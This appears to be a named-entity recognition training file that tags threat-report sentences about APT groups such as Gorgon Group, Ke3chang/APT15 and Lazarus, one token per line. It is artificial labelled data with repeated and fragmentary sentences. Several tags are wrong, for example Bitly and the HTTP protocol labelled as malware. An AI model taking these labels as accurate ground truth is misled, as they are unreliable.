+actors S-APT
+have O
+been O
+already O
+depicted O
+by O
+360 S-SECTEAM
+and O
+Tuisec S-SECTEAM
+, O
+in O
+which O
+they O
+found O
+interesting O
+connections O
+to O
+a O
+larger O
+group O
+of O
+attackers S-APT
+Unit B-SECTEAM
+42 E-SECTEAM
+researchers O
+have O
+been O
+tracking O
+, O
+which O
+we O
+are O
+calling O
+Gorgon B-APT
+Group E-APT
+. O
+
+Starting O
+in O
+February B-TIME
+2018 E-TIME
+, O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks E-SECTEAM
+identified O
+a O
+campaign O
+of O
+attacks O
+performed O
+by O
+members O
+of O
+Gorgon B-APT
+Group E-APT
+targeting O
+governmental B-IDTY
+organizations E-IDTY
+in O
+the O
+United B-LOC
+Kingdom E-LOC
+, O
+Spain S-LOC
+, O
+Russia S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+. O
+
+Starting O
+in O
+February B-TIME
+2018 E-TIME
+, O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks I-SECTEAM
+Unit I-SECTEAM
+42 E-SECTEAM
+identified O
+a O
+
+of O
+attacks O
+performed O
+by O
+members O
+of O
+Gorgon B-APT
+Group E-APT
+targeting O
+governmental B-IDTY
+organizations E-IDTY
+in O
+the O
+United B-LOC
+Kingdom E-LOC
+, O
+Spain S-LOC
+, O
+Russia S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+. O
+
+The O
+GCMAN B-APT
+group E-APT
+has O
+moved O
+beyond O
+banks S-IDTY
+and O
+is O
+now O
+targeting O
+the O
+budgeting S-IDTY
+and O
+accounting B-IDTY
+departments E-IDTY
+in O
+any O
+organization O
+of O
+interest O
+to O
+them O
+, O
+using O
+the O
+same O
+APT-style O
+tools O
+and O
+techniques O
+. O
+
+Starting O
+in O
+February B-TIME
+2018 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+identified O
+a O
+campaign O
+of O
+attacks O
+performed O
+by O
+members O
+of O
+Gorgon B-APT
+Group E-APT
+targeting O
+governmental B-IDTY
+organizations E-IDTY
+in O
+the O
+United B-LOC
+Kingdom E-LOC
+, O
+Spain S-LOC
+, O
+Russia S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+. O
+
+APT38 S-APT
+'s O
+increasingly O
+aggressive O
+targeting O
+against O
+banks S-IDTY
+. O
+
+Gorgon B-APT
+Group E-APT
+used O
+common O
+URL B-ACT
+shortening I-ACT
+services E-ACT
+to O
+download O
+payloads O
+. O
+
+The O
+GCMAN B-APT
+group E-APT
+has O
+moved O
+beyond O
+banks S-IDTY
+and O
+is O
+now O
+targeting O
+the O
+budgeting S-IDTY
+and O
+accounting B-IDTY
+departments E-IDTY
+in O
+any O
+organization O
+of O
+interest O
+to O
+them O
+, O
+using O
+the O
+same O
+APT-style O
+tools O
+and O
+techniques O
+. O
+
+APT38 S-APT
+has O
+paralleled O
+North B-LOC
+Korea E-LOC
+'s O
+worsening O
+financial O
+condition O
+. O
+
+On O
+much O
+of O
+the O
+C2 S-TOOL
+infrastructure O
+we O
+identified O
+several O
+crimeware O
+family O
+samples O
+. O
+
+While O
+investigating O
+the O
+domains O
+and O
+infrastructure O
+used O
+by O
+the O
+phishing B-ACT
+components E-ACT
+of O
+Gorgon B-APT
+Group E-APT
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+researchers O
+witnessed O
+several O
+common O
+operational O
+security O
+flaws O
+with O
+Gorgon B-APT
+Group I-APT
+'s I-APT
+actors E-APT
+throughout O
+their O
+many O
+campaigns S-ACT
+. O
+
+360 S-SECTEAM
+and O
+Tuisec S-SECTEAM
+already O
+identified O
+some O
+Gorgon B-APT
+Group E-APT
+members S-IDTY
+. O
+
+RATs S-MAL
+such O
+as O
+NjRat S-MAL
+and O
+infostealers O
+like O
+Lokibot S-MAL
+were O
+leveraging O
+the O
+same O
+C2 S-TOOL
+infrastructure O
+as O
+that O
+of O
+the O
+targeted B-ACT
+attacks E-ACT
+. O
+
+it O
+'s O
+not O
+known O
+if O
+the O
+attackers S-APT
+physically O
+reside O
+in O
+Pakistan S-LOC
+. O
+
+Gorgon S-APT
+used O
+numerous O
+decoy B-ACT
+documents E-ACT
+and O
+phishing B-ACT
+emails S-TOOL
+, O
+both O
+styles O
+of O
+attacks O
+lacked O
+overall O
+sophistication O
+. O
+
+While O
+it O
+'s O
+not O
+known O
+if O
+the O
+attackers S-APT
+physically O
+reside O
+in O
+Pakistan S-LOC
+, O
+all O
+members O
+of O
+Gorgon B-APT
+Group E-APT
+purport O
+to O
+be O
+in O
+Pakistan S-LOC
+based O
+on O
+their O
+online O
+personas O
+. O
+
+Starting O
+in O
+mid-February S-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+researchers O
+have O
+been O
+tracking O
+an O
+active B-ACT
+campaign E-ACT
+sharing O
+a O
+significant O
+portion O
+of O
+infrastructure O
+leveraged O
+by O
+Gorgon B-APT
+Group E-APT
+for O
+criminal B-ACT
+and I-ACT
+targeted I-ACT
+attacks E-ACT
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+researchers O
+have O
+been O
+tracking O
+Gorgon B-APT
+Group E-APT
+for O
+criminal B-ACT
+and I-ACT
+targeted I-ACT
+attacks E-ACT
+. O
+
+As O
+part O
+of O
+the O
+investigation O
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+researchers O
+were O
+able O
+to O
+identify O
+an O
+interesting O
+characteristic O
+about O
+how O
+the O
+Gorgon B-APT
+Group E-APT
+crew O
+uses O
+shared B-MAL
+infrastructure E-MAL
+between O
+cybercrime B-ACT
+and I-ACT
+targeted I-ACT
+attacks E-ACT
+. O
+
+The O
+crew O
+combines O
+both O
+regular O
+crime O
+and O
+targeted B-ACT
+attack E-ACT
+objectives O
+using O
+the O
+same O
+domain B-MAL
+infrastructure E-MAL
+over O
+time O
+, O
+rarely O
+changing O
+their O
+TTPs O
+. O
+
+One O
+interesting O
+note O
+about O
+the O
+criminal B-ACT
+activity E-ACT
+of O
+Gorgon B-APT
+Group E-APT
+is O
+their O
+usage O
+of O
+Bitly S-MAL
+. O
+
+Between O
+April B-TIME
+1 I-TIME
+, I-TIME
+2018 E-TIME
+and O
+May B-TIME
+30 I-TIME
+, I-TIME
+2018 E-TIME
+, O
+we O
+observed O
+the O
+domain O
+stevemike-fireforce.info O
+used O
+in O
+a O
+Gorgon B-ACT
+Group I-ACT
+cybercrime I-ACT
+campaign E-ACT
+involving O
+more O
+than O
+2,300 O
+emails S-TOOL
+and O
+19 O
+documents O
+in O
+the O
+initial O
+attack O
+. O
+
+Similar O
+to O
+that O
+of O
+their O
+targeted B-ACT
+attacks E-ACT
+, O
+Gorgon B-APT
+Group E-APT
+leveraged O
+Bitly S-MAL
+for O
+distribution O
+and O
+shortening O
+of O
+C2 S-TOOL
+domains O
+. O
+
+Beginning O
+in O
+early B-TIME
+March I-TIME
+2018 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+started O
+observing O
+targeted B-ACT
+attacks E-ACT
+against O
+Russian S-LOC
+, O
+Spanish S-LOC
+and O
+United B-LOC
+States E-LOC
+government B-IDTY
+agencies E-IDTY
+operating O
+in O
+Pakistan S-LOC
+. O
+
+Leveraging O
+click O
+counts O
+for O
+the O
+campaign O
+for O
+Bitly S-MAL
+, O
+we O
+were O
+able O
+to O
+see O
+Gorgon B-APT
+Group E-APT
+'s O
+activity O
+volume O
+increase O
+throughout O
+April S-TIME
+. O
+
+As O
+we O
+continued O
+to O
+investigate O
+, O
+it O
+became O
+apparent O
+that O
+Gorgon B-APT
+Group E-APT
+had O
+been O
+consistently O
+targeting O
+worldwide O
+governmental B-IDTY
+organizations E-IDTY
+operating O
+within O
+Pakistan S-LOC
+. O
+
+Starting O
+in O
+mid-February S-TIME
+. O
+
+Additionally O
+, O
+during O
+that O
+time O
+, O
+members O
+of O
+Gorgon B-APT
+Group E-APT
+were O
+also O
+performing O
+criminal B-ACT
+operations E-ACT
+against O
+targets O
+across O
+the O
+globe O
+, O
+often O
+using O
+shared B-MAL
+infrastructure E-MAL
+with O
+their O
+targeted B-ACT
+attack I-ACT
+operations E-ACT
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+researchers O
+have O
+been O
+tracking O
+an O
+active B-ACT
+campaign E-ACT
+. O
+
+This O
+Gorgon B-ACT
+Group I-ACT
+campaign E-ACT
+leveraged O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+with O
+Microsoft B-FILE
+Word I-FILE
+documents E-FILE
+exploiting O
+CVE-2017-0199 S-VULID
+. O
+
+Beginning O
+in O
+early B-TIME
+March I-TIME
+2018 E-TIME
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+started O
+observing O
+Gorgon B-ACT
+group I-ACT
+attacks E-ACT
+against O
+Russian S-LOC
+, O
+Spanish S-LOC
+and O
+United B-LOC
+States E-LOC
+government B-IDTY
+agencies E-IDTY
+operating O
+in O
+Pakistan S-LOC
+. O
+
+Like O
+all O
+of O
+Gorgon B-APT
+Group E-APT
+'s O
+members O
+, O
+Fudpage O
+'s O
+online O
+profile O
+, O
+infrastructure B-MAL
+utilization E-MAL
+and O
+standardization S-MAL
+, O
+connects O
+them O
+back O
+to O
+Gorgon B-APT
+Group E-APT
+. O
+
+Ultimately O
+, O
+this O
+lead O
+us O
+to O
+the O
+conclusion O
+that O
+several O
+of O
+Gorgon B-APT
+Group E-APT
+'s O
+members O
+have O
+a O
+nexus O
+in O
+Pakistan S-LOC
+. O
+
+Gorgon B-APT
+Group E-APT
+isn't O
+the O
+first O
+actor O
+group O
+we've O
+witnessed O
+dabble O
+in O
+both O
+nation O
+state O
+level O
+and O
+criminal B-ACT
+attacks E-ACT
+. O
+
+Overall O
+, O
+in O
+spite O
+of O
+the O
+lack O
+of O
+sophistication O
+in O
+Gorgon B-APT
+Group E-APT
+'s O
+activity O
+, O
+they O
+were O
+still O
+relatively O
+successful O
+; O
+once O
+again O
+proving O
+that O
+simple O
+attacks O
+on O
+individuals O
+without O
+proper O
+protections O
+, O
+work O
+. O
+
+On O
+January B-TIME
+15 E-TIME
+, O
+Advanced B-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+discovered O
+an O
+operation O
+using O
+a O
+new O
+variant O
+of O
+the O
+SYSCON B-MAL
+backdoor E-MAL
+. O
+
+The O
+Korean-language O
+Word B-MAL
+document E-MAL
+manual.doc S-FILE
+appeared O
+in O
+Vietnam S-LOC
+on O
+January B-TIME
+17 E-TIME
+, O
+with O
+the O
+original O
+author O
+name O
+of O
+Honeybee S-APT
+. O
+
+While O
+Gorgon B-APT
+Group E-APT
+has O
+been O
+making O
+minor O
+changes O
+in O
+their O
+methodologies O
+, O
+they O
+are O
+still O
+actively O
+involved O
+in O
+both O
+targeted O
+and O
+criminal B-ACT
+attacks E-ACT
+. O
+
+This O
+malicious O
+document O
+contains O
+a O
+Visual B-ACT
+Basic I-ACT
+macro E-ACT
+that O
+dropped O
+and O
+executed O
+an O
+upgraded O
+version O
+of O
+the O
+implant O
+known O
+as O
+SYSCON S-MAL
+, O
+which O
+appeared O
+in O
+2017 S-TIME
+in O
+malicious B-FILE
+Word I-FILE
+documents E-FILE
+as O
+part O
+of O
+several O
+campaigns S-ACT
+using O
+North S-LOC
+Korea–related O
+topics O
+. O
+
+This O
+key O
+was O
+also O
+used O
+in O
+the O
+Honeybee B-ACT
+campaign E-ACT
+and O
+appears O
+to O
+have O
+been O
+used O
+since O
+August B-TIME
+2017 E-TIME
+. O
+
+Several O
+additional O
+documents O
+surfaced O
+between O
+January B-TIME
+17 E-TIME
+and O
+February B-TIME
+3 E-TIME
+. O
+
+All O
+contain O
+the O
+same O
+Visual B-ACT
+Basic I-ACT
+macro I-ACT
+code E-ACT
+and O
+author O
+name O
+as O
+Honeybee S-APT
+. O
+
+Some O
+of O
+the O
+malicious O
+documents O
+were O
+test B-MAL
+files E-MAL
+without O
+the O
+implant O
+. O
+
+From O
+our O
+analysis O
+, O
+Honeybee S-APT
+submitted O
+most O
+of O
+these O
+documents O
+from O
+South B-LOC
+Korea E-LOC
+, O
+indicating O
+that O
+some O
+of O
+the O
+targeting O
+was O
+in O
+South B-LOC
+Korea E-LOC
+. O
+
+Honeybee S-APT
+attacked O
+beyond O
+the O
+borders O
+of O
+South B-LOC
+Korea E-LOC
+to O
+target O
+Vietnam S-LOC
+, O
+Singapore S-LOC
+, O
+Argentina S-LOC
+, O
+Japan S-LOC
+, O
+Indonesia S-LOC
+, O
+and O
+Canada S-LOC
+. O
+
+Honeybee S-APT
+appears O
+to O
+target O
+humanitarian O
+aid O
+and O
+inter-Korean S-LOC
+affairs O
+. O
+
+McAfee B-SECTEAM
+Advanced I-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+team O
+'s O
+analysis O
+, O
+we O
+find O
+multiple O
+components O
+from O
+this O
+operation O
+are O
+unique O
+from O
+a O
+code O
+perspective O
+, O
+even O
+though O
+the O
+code O
+is O
+loosely O
+based O
+on O
+previous O
+versions O
+of O
+the O
+SYSCON B-MAL
+backdoor E-MAL
+. O
+
+Large-scale O
+cyber B-ACT
+espionage I-ACT
+campaigns E-ACT
+such O
+as O
+" O
+GhostNet S-ACT
+" O
+. O
+
+As O
+the O
+crisis O
+in O
+Syria S-LOC
+escalates O
+, O
+FireEye S-SECTEAM
+researchers O
+have O
+discovered O
+a O
+cyber B-ACT
+espionage I-ACT
+campaign E-ACT
+, O
+which O
+we O
+call O
+" O
+Ke3chang S-APT
+" O
+, O
+that O
+falsely O
+advertises O
+information O
+updates O
+about O
+the O
+ongoing O
+crisis O
+to O
+compromise O
+MFA O
+networks O
+in O
+Europe S-LOC
+. O
+
+As O
+the O
+crisis O
+in O
+Syria S-LOC
+escalates O
+, O
+FireEye S-SECTEAM
+researchers O
+have O
+discovered O
+a O
+threat O
+group O
+, O
+which O
+we O
+call O
+" O
+Ke3chang S-APT
+" O
+, O
+that O
+falsely O
+advertises O
+information O
+updates O
+about O
+the O
+ongoing O
+crisis O
+to O
+compromise O
+MFA O
+networks O
+in O
+Europe S-LOC
+. O
+
+We O
+believe O
+that O
+the O
+Ke3chang S-APT
+attackers S-APT
+are O
+operating O
+out O
+of O
+China S-LOC
+and O
+have O
+been O
+active O
+since O
+at O
+least O
+2010 S-TIME
+. O
+
+FireEye S-SECTEAM
+gained O
+visibility O
+into O
+one O
+of O
+23 O
+known O
+command-and-control S-TOOL
+( O
+CnC S-TOOL
+) O
+servers O
+operated O
+by O
+the O
+Ke3chang B-APT
+actor E-APT
+for O
+about O
+one O
+week O
+. O
+
+Each O
+attack O
+comprises O
+a O
+variety O
+of O
+phases O
+, O
+including O
+reconnaissance O
+, O
+exploitation O
+, O
+command O
+and O
+control O
+, O
+lateral O
+movement O
+, O
+and O
+Exfiltration S-ACT
+. O
+
+The O
+Ke3chang S-APT
+attackers S-APT
+have O
+been O
+active O
+since O
+at O
+least O
+2010 S-TIME
+. O
+
+traditionally O
+targeted O
+the O
+aerospace S-IDTY
+, O
+energy S-IDTY
+, O
+government S-IDTY
+, O
+high-tech S-IDTY
+, O
+consulting B-IDTY
+services E-IDTY
+, O
+and O
+chemicals S-IDTY
+/ O
+manufacturing S-IDTY
+/ O
+mining B-IDTY
+sectors E-IDTY
+. O
+
+The O
+Ke3chang S-APT
+have O
+used O
+three O
+types O
+of O
+malware O
+over O
+the O
+years O
+and O
+have O
+traditionally O
+targeted O
+the O
+aerospace S-IDTY
+, O
+energy S-IDTY
+, O
+government S-IDTY
+, O
+high-tech S-IDTY
+, O
+consulting B-IDTY
+services E-IDTY
+, O
+chemicals S-IDTY
+, O
+manufacturing S-IDTY
+, O
+mining B-IDTY
+sectors E-IDTY
+. O
+
+August B-TIME
+2013 E-TIME
+, O
+FireEye S-SECTEAM
+gained O
+visibility O
+on O
+one O
+of O
+22 O
+CnC O
+servers O
+used O
+at O
+that O
+time O
+by O
+the O
+Ke3chang S-APT
+attackers S-APT
+. O
+
+In O
+this O
+report O
+, O
+we O
+present O
+the O
+historical O
+intelligence O
+we O
+have O
+gathered O
+on O
+the O
+Ke3chang B-ACT
+campaign E-ACT
+, O
+as O
+well O
+as O
+an O
+in-depth O
+assessment O
+of O
+the O
+ongoing O
+Syrian-themed B-ACT
+attacks E-ACT
+against O
+these O
+MFAs O
+. O
+
+Ke3chang S-APT
+attackers S-APT
+have O
+used O
+spear-phishing S-ACT
+emails S-TOOL
+. O
+
+Ke3chang S-APT
+has O
+also O
+leveraged O
+a O
+Java S-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2012-4681 S-VULID
+) O
+, O
+as O
+well O
+as O
+older O
+, O
+reliable O
+exploits O
+for O
+Microsoft B-FILE
+Word E-FILE
+( O
+CVE-2010-3333 S-VULID
+) O
+and O
+Adobe B-MAL
+PDF I-MAL
+Reader E-MAL
+( O
+CVE-2010-2883 S-VULID
+) O
+. O
+
+Traditionally O
+, O
+the O
+Ke3chang S-APT
+attackers S-APT
+have O
+used O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+either O
+a O
+malware O
+attachment O
+or O
+a O
+link O
+to O
+a O
+malicious O
+download O
+. O
+
+Over O
+the O
+years O
+, O
+the O
+Ke3chang S-APT
+attackers S-APT
+have O
+used O
+three O
+types O
+of O
+malware O
+that O
+we O
+call O
+: O
+" O
+BS2005 S-MAL
+" O
+, O
+" O
+BMW S-MAL
+" O
+, O
+and O
+" O
+MyWeb S-MAL
+" O
+. O
+
+it O
+is O
+a O
+typical O
+first O
+stage O
+backdoor O
+commonly O
+found O
+in O
+APT B-ACT
+attacks E-ACT
+. O
+
+The O
+attackers S-APT
+have O
+used O
+three O
+types O
+of O
+malware O
+over O
+the O
+years O
+and O
+have O
+traditionally O
+targeted O
+the O
+aerospace S-IDTY
+, O
+energy S-IDTY
+, O
+government S-IDTY
+, O
+high-tech S-IDTY
+, O
+consulting B-IDTY
+services E-IDTY
+, O
+and O
+chemicals S-IDTY
+/ O
+manufacturing S-IDTY
+/ O
+mining B-IDTY
+sectors E-IDTY
+. O
+
+All O
+of O
+the O
+CnC O
+communications O
+are O
+performed O
+over O
+the O
+HTTP B-MAL
+protocol E-MAL
+. O
+
+The O
+current O
+Ke3chang B-ACT
+campaign E-ACT
+leverages O
+the O
+BS2005 S-MAL
+malware S-MAL
+, O
+while O
+older O
+activity O
+from O
+2010 S-TIME
+- O
+2011 S-TIME
+leveraged O
+BMW S-MAL
+, O
+followed O
+by O
+the O
+MyWeb S-MAL
+malware S-MAL
+sporadically O
+used O
+in O
+between O
+. O
+
+A O
+trait O
+common O
+to O
+all O
+three O
+malware O
+families O
+we O
+analyzed O
+is O
+that O
+they O
+use O
+the O
+IWebBrowser2 B-MAL
+COM E-MAL
+interface O
+to O
+perform O
+their O
+CnC O
+communication O
+. O
+
+Three O
+months O
+after O
+the O
+Olympics-themed B-ACT
+attacks E-ACT
+, O
+FireEye S-SECTEAM
+observed O
+a O
+new O
+BS2005 B-ACT
+campaign E-ACT
+labeled O
+" O
+newtiger S-ACT
+" O
+, O
+which O
+is O
+possibly O
+a O
+reference O
+to O
+an O
+older O
+2010 B-ACT
+campaign E-ACT
+labeled O
+" O
+tiger O
+" O
+. O
+
+Using O
+information O
+from O
+the O
+FireEye B-SECTEAM
+DTI E-SECTEAM
+cloud O
+, O
+FireEye S-SECTEAM
+observed O
+that O
+Ke3chang S-APT
+targeted O
+a O
+single O
+firm O
+. O
+
+The O
+Ke3chang S-APT
+attackers S-APT
+used O
+the O
+older O
+" O
+MyWeb S-MAL
+" O
+malware O
+family O
+from O
+2010 S-TIME
+to O
+2011 S-TIME
+. O
+
+The O
+Ke3chang S-APT
+attackers S-APT
+used O
+the O
+older O
+MyWeb S-MAL
+malware S-MAL
+family O
+from O
+2010 S-TIME
+to O
+2011 S-TIME
+. O
+
+During O
+our O
+period O
+of O
+visibility O
+into O
+the O
+BS2005 S-ACT
+" O
+moviestar S-ACT
+" O
+campaign O
+against O
+various O
+ministries B-IDTY
+of I-IDTY
+foreign I-IDTY
+affairs E-IDTY
+in O
+Europe S-LOC
+, O
+FireEye S-SECTEAM
+discovered O
+that O
+the O
+Ke3chang S-APT
+had O
+initially O
+tested O
+the O
+malware O
+in O
+virtual O
+machines O
+, O
+prior O
+to O
+compromising O
+actual O
+targets O
+. O
+
+The O
+MyWeb B-MAL
+sample E-MAL
+that O
+FireEye S-SECTEAM
+analyzed O
+has O
+a O
+compile O
+date O
+of O
+1/20/2011 S-TIME
+. O
+
+At O
+least O
+one O
+of O
+the O
+attacks O
+in O
+this O
+campaign O
+leveraged O
+a O
+European S-LOC
+security O
+and O
+defense-themed O
+lure O
+, O
+which O
+aligns O
+with O
+the O
+targeting O
+preferences O
+for O
+this O
+group O
+. O
+
+MyWeb S-MAL
+is O
+the O
+second-generation O
+malware O
+used O
+by O
+Ke3chang S-APT
+. O
+
+ministries B-IDTY
+of I-IDTY
+foreign I-IDTY
+affairs E-IDTY
+in O
+Europe S-LOC
+have O
+been O
+targeted O
+and O
+compromised O
+by O
+a O
+threat O
+actor O
+we O
+call O
+Ke3chang S-APT
+. O
+
+This O
+attack O
+used O
+the O
+crisis O
+in O
+Syria S-LOC
+as O
+a O
+lure O
+to O
+deliver O
+malware O
+to O
+its O
+targets O
+. O
+
+Tracking O
+the O
+malicious B-ACT
+activities E-ACT
+of O
+the O
+elusive O
+Ke3chang S-APT
+APT O
+group O
+, O
+ESET S-SECTEAM
+researchers O
+have O
+discovered O
+new O
+versions O
+of O
+malware O
+families O
+linked O
+to O
+the O
+group O
+, O
+and O
+a O
+previously O
+unreported O
+backdoor O
+. O
+
+Furthermore O
+, O
+FireEye S-SECTEAM
+has O
+presented O
+evidence O
+indicating O
+that O
+the O
+Ke3chang S-APT
+attackers S-APT
+have O
+been O
+active O
+since O
+at O
+least O
+2010 S-TIME
+and O
+have O
+attacked O
+targets O
+related O
+to O
+G20 B-IDTY
+meetings E-IDTY
+in O
+the O
+past O
+. O
+
+During O
+our O
+brief O
+window O
+of O
+visibility O
+into O
+one O
+of O
+the O
+known O
+22 O
+CnC O
+nodes O
+, O
+FireEye S-SECTEAM
+observed O
+the O
+Ke3chang S-APT
+conducting O
+reconnaissance O
+and O
+moving O
+laterally O
+throughout O
+the O
+compromised O
+networks O
+. O
+
+Ke3chang S-APT
+attackers S-APT
+are O
+operating O
+within O
+China S-LOC
+. O
+
+In O
+May B-TIME
+2017 E-TIME
+, O
+NCC B-SECTEAM
+Group I-SECTEAM
+'s I-SECTEAM
+Incident I-SECTEAM
+Response E-SECTEAM
+team O
+reacted O
+to O
+an O
+ongoing O
+incident O
+. O
+
+which O
+provides O
+a O
+range O
+of O
+services O
+to O
+UK B-IDTY
+Government E-IDTY
+. O
+
+APT15 S-APT
+was O
+targeting O
+information O
+related O
+to O
+UK S-LOC
+government S-IDTY
+departments O
+and O
+military B-IDTY
+technology E-IDTY
+. O
+
+backdoors O
+that O
+now O
+appear O
+to O
+be O
+part O
+of O
+APT15 S-APT
+'s O
+toolset O
+. O
+
+This O
+report O
+demonstrates O
+that O
+Ke3chang S-APT
+is O
+able O
+to O
+successfully O
+penetrate O
+government S-IDTY
+targets O
+using O
+exploits O
+for O
+vulnerabilities O
+that O
+have O
+already O
+been O
+patched O
+and O
+despite O
+the O
+fact O
+that O
+these O
+ministries O
+have O
+defenses O
+in O
+place O
+. O
+
+RoyalDNS S-MAL
+- O
+required O
+APT15 S-APT
+. O
+
+The O
+Ke3chang B-APT
+group E-APT
+also O
+used O
+keyloggers S-MAL
+and O
+their O
+own O
+.NET B-MAL
+tool E-MAL
+to O
+enumerate O
+folders O
+and O
+dump O
+data O
+from O
+Microsoft S-IDTY
+Exchange O
+mailboxes O
+. O
+
+APT15 S-APT
+was O
+also O
+observed O
+using O
+Mimikatz S-MAL
+to O
+dump O
+credentials O
+and O
+generate O
+Kerberos O
+golden O
+tickets O
+. O
+
+This O
+time O
+, O
+APT15 S-APT
+opted O
+for O
+a O
+DNS B-MAL
+based I-MAL
+backdoor E-MAL
+: O
+RoyalDNS S-MAL
+. O
+
+APT15 S-APT
+then O
+used O
+a O
+tool O
+known O
+as O
+RemoteExec S-MAL
+. O
+
+APT15 S-APT
+then O
+used O
+a O
+tool O
+known O
+as O
+RemoteExec S-MAL
+( O
+similar O
+to O
+Microsoft S-IDTY
+. O
+
+Coincidentally O
+, O
+following O
+the O
+recent O
+hack O
+of O
+a O
+US S-LOC
+Navy S-IDTY
+contractor O
+and O
+theft O
+of O
+highly O
+sensitive O
+data O
+on O
+submarine O
+warfare O
+, O
+we O
+have O
+found O
+evidence O
+of O
+very O
+recent O
+activity O
+by O
+a O
+group O
+referred O
+to O
+as O
+APT15 S-APT
+, O
+known O
+for O
+committing O
+cyber B-APT
+espionage E-APT
+which O
+is O
+believed O
+to O
+be O
+affiliated O
+with O
+the O
+Chinese S-LOC
+government O
+. O
+
+APT15 S-APT
+is O
+known O
+for O
+committing O
+cyberespionage S-APT
+against O
+companies O
+and O
+organizations O
+located O
+in O
+many O
+different O
+countries O
+, O
+targeting O
+different O
+sectors O
+such O
+as O
+the O
+oil B-IDTY
+industry E-IDTY
+, O
+government B-IDTY
+contractors E-IDTY
+, O
+military S-IDTY
+, O
+and O
+more O
+. O
+
+Other O
+names O
+for O
+the O
+group O
+are O
+Vixen B-APT
+Panda E-APT
+, O
+Ke3chang S-APT
+, O
+Royal B-APT
+APT E-APT
+, O
+and O
+Playful B-APT
+Dragon E-APT
+. O
+
+ther O
+names O
+for O
+the O
+group O
+are O
+Vixen B-APT
+Panda E-APT
+, O
+Ke3chang S-APT
+, O
+Royal B-APT
+APT E-APT
+, O
+and O
+Playful B-APT
+Dragon E-APT
+. O
+
+There O
+are O
+many O
+articles O
+and O
+researches O
+online O
+about O
+APT15 S-APT
+and O
+their O
+activities S-ACT
+, O
+the O
+most O
+recent O
+one O
+by O
+NCC B-SECTEAM
+Group E-SECTEAM
+. O
+
+There O
+are O
+many O
+articles O
+and O
+researches O
+online O
+about O
+APT15 S-APT
+and O
+their O
+activities S-ACT
+, O
+the O
+most O
+recent O
+one O
+by O
+NCC B-SECTEAM
+Group E-SECTEAM
+; O
+although O
+posted O
+in O
+March B-TIME
+2018 E-TIME
+, O
+it O
+refers O
+to O
+a O
+campaign O
+in O
+2017 S-TIME
+. O
+
+both O
+attributed O
+to O
+Chinese S-LOC
+government O
+affiliated O
+groups O
+. O
+
+DLL B-ACT
+hijacking I-ACT
+techniques E-ACT
+have O
+been O
+seen O
+in O
+the O
+past O
+with O
+the O
+APT15 B-APT
+group E-APT
+. O
+
+cyber B-APT
+actors E-APT
+of O
+the O
+North B-LOC
+Korean E-LOC
+to O
+target O
+the O
+media S-IDTY
+, O
+aerospace S-IDTY
+, O
+financial S-IDTY
+, O
+and O
+critical B-IDTY
+infrastructure I-IDTY
+sectors E-IDTY
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+globally O
+. O
+
+The O
+U.S. B-IDTY
+Government E-IDTY
+refers O
+to O
+the O
+malicious B-ACT
+cyber I-ACT
+activity E-ACT
+by O
+the O
+North B-LOC
+Korean E-LOC
+government O
+as O
+HIDDEN B-APT
+COBRA E-APT
+. O
+
+Tools O
+and O
+capabilities O
+used O
+by O
+HIDDEN B-APT
+COBRA I-APT
+actors E-APT
+include O
+DDoS B-MAL
+botnets E-MAL
+, O
+keyloggers S-MAL
+, O
+remote B-MAL
+access I-MAL
+tools E-MAL
+( O
+RATs S-MAL
+) O
+, O
+and O
+wiper S-MAL
+malware S-MAL
+. O
+
+Variants O
+of O
+malware O
+and O
+tools O
+used O
+by O
+HIDDEN B-APT
+COBRA I-APT
+actors E-APT
+include O
+Destover S-MAL
+and O
+Hangman S-MAL
+. O
+
+DHS S-SECTEAM
+has O
+previously O
+released O
+Alert O
+TA14-353A O
+. O
+
+The O
+DeltaCharlie O
+DDoS O
+bot O
+was O
+originally O
+reported O
+by O
+Novetta S-SECTEAM
+in O
+their O
+2016 S-TIME
+Operation B-ACT
+Blockbuster I-ACT
+Malware E-ACT
+Report O
+. O
+
+Our O
+analysis O
+shows O
+that O
+the O
+cybercriminals S-APT
+behind O
+the O
+attack O
+against O
+an O
+online O
+casino O
+in O
+Central B-LOC
+America E-LOC
+, O
+and O
+several O
+other O
+targets O
+in O
+late-2017 S-TIME
+, O
+were O
+most O
+likely O
+the O
+infamous O
+Lazarus B-APT
+hacking I-APT
+group E-APT
+. O
+
+The O
+Lazarus B-APT
+Group E-APT
+was O
+first O
+identified O
+in O
+Novetta S-SECTEAM
+'s O
+report O
+Operation B-ACT
+Blockbuster E-ACT
+in O
+February B-TIME
+2016 E-TIME
+. O
+
+cyberattacks O
+against O
+high-value O
+targets O
+in O
+Ukraine S-LOC
+in O
+December B-TIME
+2015 E-TIME
+and O
+December B-TIME
+2016 E-TIME
+. O
+
+In O
+all O
+of O
+these O
+incidents O
+, O
+the O
+Lazarus S-APT
+utilized O
+similar O
+toolsets O
+, O
+including O
+KillDisk S-MAL
+that O
+was O
+executed O
+on O
+compromised O
+machines O
+. O
+
+We O
+are O
+confident O
+this O
+KillDisk S-MAL
+malware S-MAL
+was O
+deployed O
+by O
+Lazarus S-APT
+, O
+rather O
+than O
+by O
+another O
+, O
+unrelated O
+attacker S-APT
+. O
+
+This O
+recent O
+attack O
+against O
+an O
+online O
+casino O
+in O
+Central B-LOC
+America E-LOC
+suggests O
+that O
+hacking O
+tools O
+from O
+the O
+Lazarus S-APT
+toolset O
+are O
+recompiled O
+with O
+every O
+attack O
+( O
+we O
+didn't O
+see O
+these O
+exact O
+samples O
+anywhere O
+else O
+) O
+. O
+
+Utilizing O
